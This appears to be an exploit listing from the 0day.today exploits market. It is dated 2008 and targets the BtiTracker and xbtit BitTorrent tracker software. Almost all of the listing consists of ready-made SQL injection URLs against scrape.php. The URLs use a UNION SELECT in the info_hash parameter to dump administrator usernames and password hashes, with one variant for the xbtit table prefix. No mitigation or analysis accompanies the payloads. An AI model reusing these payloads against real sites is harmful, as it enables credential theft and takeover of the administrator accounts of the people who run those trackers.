[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BtiTracker <= 1.4.7, xbtit <= 2.0.542 SQL Injection Vulnerability

Author
InATeam
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3556
Category
web applications
Date add
24-08-2008
Platform
unsorted
=================================================================
BtiTracker <= 1.4.7, xbtit <= 2.0.542 SQL Injection Vulnerability
=================================================================



## BtiTracker/xBtiTracker Remote SQL Injection Vulnerability
## Affected versions: BtiTracker <= 1.4.7, xBtiTracker <= 2.0.542
## Software site: http://www.btiteam.org/
##
## ==============================================================================
## Exploit:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+users+WHERE+id_level=8/*
## ==============================================================================
## for xBtiTracker we need to specify prefix:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+xbtit_users+WHERE+id_level=8/*
## ==============================================================================



#  0day.today [2024-12-25]  #